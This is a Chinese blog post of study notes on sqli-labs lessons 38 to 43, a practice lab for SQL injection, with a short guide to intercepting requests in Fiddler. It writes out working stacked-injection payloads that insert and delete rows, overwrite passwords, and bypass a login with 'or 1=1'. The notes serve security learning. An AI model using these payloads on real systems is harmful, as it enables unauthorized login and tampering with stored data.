sqli-labs学习笔记 DAY8

sqli-labs学习笔记 DAY8

 

DAY 8

sqli-lab Page-3

sqli-labs lesson 38

  • What is Stacked injection?
    https://blog.csdn.net/Fly_hps/article/details/80288678
  • SQL插入语句: 
    INSERT INTO table_name (column1,column2,column3,...)
VALUES (value1,value2,value3,...);
    或者 
    INSERT INTO table_name 
VALUES (value1,value2,value3,...);
  • payload构建:?id=1';insert into users values (99,'test','test')--+
  • 注:闭合符号、表名以及字段可以通过之前学习的方法获得。
  • 结果:
    image

sqli-labs lesson 39

  • SQL删除语句: 
    DELETE FROM table_name
WHERE some_column=some_value;
  • 跟上一题一样,只不过是数值型的参数,我们用delete语句把上次插入的记录删除
  • payload构建:?id=1;delete from users where id=99--+
  • 结果:
    image

sqli-labs lesson 40

  • SQL更新语句: 
    UPDATE table_name
SET column1=value1,column2=value2,...
WHERE some_column=some_value;
  • 利用联合查询或者盲注获得闭合符号、数据库名、表名、字段名等,更新id=1的密码
  • payload:?id=99') UNION SELECT 1,2,3;update users set password='god' where id=1--+
  • 结果:
    image

sqli-labs lesson 41

  • 跟上一题一样,只不过是数值型注入

sqli-labs lesson 42

  • 万能密码:
    • 用户名:随意
    • 密码:0' or 1=1;#
    • 结果:直接登录id=1的账号
  • Stacked Injection:
    • 抓包:这里用Fiddler
      image
    • 改包:密码改为1';update users set password='test' where username='admin'#
    • 结果:成功更改了admin账号的密码
      image

sqli-labs lesson 43

  • 这一题与上一题一样,闭合符号是’)

Fiddler使用

  • 下载与安装:https://www.telerik.com/fiddler
  • 界面:

     

  • 抓包:
    • 快捷键F12打开抓包(默认为8888端口),image出现该图标即已经打开。
    • 抓包结果在左侧。imageimage点击后左侧新增一个记录,打开后可以修改请求。
    • 修改完毕,点击image

 

speech.gif posted on 2019-03-01 15:48 Tiumo 阅读( ...) 评论( ...) 编辑 收藏
posted @ 2019-03-01 15:48  杨谖之  阅读(11)  评论(0)    收藏  举报  来源